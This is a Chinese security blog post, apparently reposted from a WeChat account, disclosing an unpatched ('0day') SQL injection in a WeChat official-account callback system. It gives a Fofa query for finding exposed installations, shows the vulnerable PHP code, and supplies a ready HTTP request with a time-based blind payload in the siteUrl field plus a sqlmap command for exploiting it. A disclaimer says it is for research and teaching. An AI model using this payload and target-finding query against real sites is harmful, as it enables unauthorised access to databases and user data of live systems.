某vx公众号无限回调系统存在SQL注入漏洞

admin

138883
文章

114
评论

2024年7月12日15:13:29评论76 views字数 2320阅读7分44秒阅读模式

漏洞简介

微信公众平台无限回调系统是一个适用于H5游戏，H5网站，一切需要公众号登录接口的H5网站，且附带登录注册功能.

资产详情

Fofa:"mb-5 web-font-desc"

‍‍ 某vx公众号无限回调系统存在SQL注入漏洞

漏洞分析

在 /user/ajax.php 中的使用$_REQUEST传参 act 来调用不同接口，我们来看一下 siteadd 接口

<?phpif (!$_REQUEST['act']) jsonShow('0', '参数错误');$mod = 'user';$notLogin = true;require_once '../includes/common.php';$act = $_REQUEST['act'];switch ($act) {    ......    case 'siteadd':    if ($userData['userMoney'] < $authPrice) jsonShow(0, '余额不足');    $urlData = $userClass->GetUrl($_POST['siteUrl']); //这里进入了GetUrl方法    if (!empty($urlData)) jsonShow(0, '站点已授权');    $_POST['siteStopTime'] = str_replace('T', ' ', $_POST['siteStopTime']);    $_POST['siteAddTime'] = date('Y-m-d H:i:s');    $codeData = explode('|', $_POST['code']);    unset($_POST['code']);    $_POST['codeId'] = $codeData['0'];    $_POST['codeName'] = $codeData['1'];    $_POST['siteState'] = $codeData['2'];    $_POST['userName'] = $_SESSION['userName'];    $_POST['siteCode'] = md5(uniqid() . mt_rand());    $upData = false;    $upStatusData = $userClass->GetUpStatus($userData['statusCode'], $userData['userUseMoney'] + $authPrice);    if (!empty($upStatusData)) $upData = $upStatusData['0'];    if (!$userClass->AddSite($_POST, $authPrice, $upData)) jsonShow(0, '未知错误');    jsonShow('1', '添加成功');

$urlData 变量被赋值为 GetUrl($_POST['siteUrl']); 这里直接使用POST传入，且未有任何过滤咱们追踪一下

最终在 /includes/class/user.class.php 中，咱们找到了GetUrl方法

public function GetUrl($url){    return $this->DB->query("SELECT * FROM `auth_site` WHERE `siteUrl` = '$url'")->fetch(PDO::FETCH_ASSOC);}

这里很明显地看到被传入进去地 $url 被直接带入到了SELECT 查询中，很明显这里就是一处SQL盲注.

漏洞复现

Payload:

POST /user/ajax.php?act=siteadd HTTP/1.1Host: 127.0.0.1Cache-Control: max-age=0sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="101"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Length: 27siteUrl=';select sleep(5)#'

某vx公众号无限回调系统存在SQL注入漏洞 python sqlmap.py -r a.txt --level=3 --dbms=mysql

标签:代码审计，0day，渗透测试，系统，通用，0day，公众号，源码，回调

vx回调系统源码关注公众号发送 ht 获取

免责声明

文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，文章作者和本公众号不承担任何法律及连带责任，望周知！！!

原文始发于微信公众号（星悦安全）：某vx公众号无限回调系统存在SQL注入漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

某vx公众号无限回调系统存在SQL注入漏洞

CVE-2025-22457：基于堆栈的远程缓冲区溢出的POC验证脚本

Kubernetes CVE-2025-1974 RCE POC

CVE-2025-27218｜Sitecore CMS远程代码执行漏洞

CentreStack 反序列化漏洞 (CVE-2025-30406)

Windows提权漏洞CVE-2025-21204

漏洞预警博华X龙防火墙系统 arp_scan文件读取漏洞

网安人的咯噔文学|CVE-2025-404NotFound？

CVE-2025-21204: Windows Update Stack 中的不当链接跟随导致的权限提升

Windows 提权漏洞速报：CVE-2025-21204

Jupyter Remote Desktop未授权访问漏洞CVE-2025-32428

发表评论

在线咨询

微信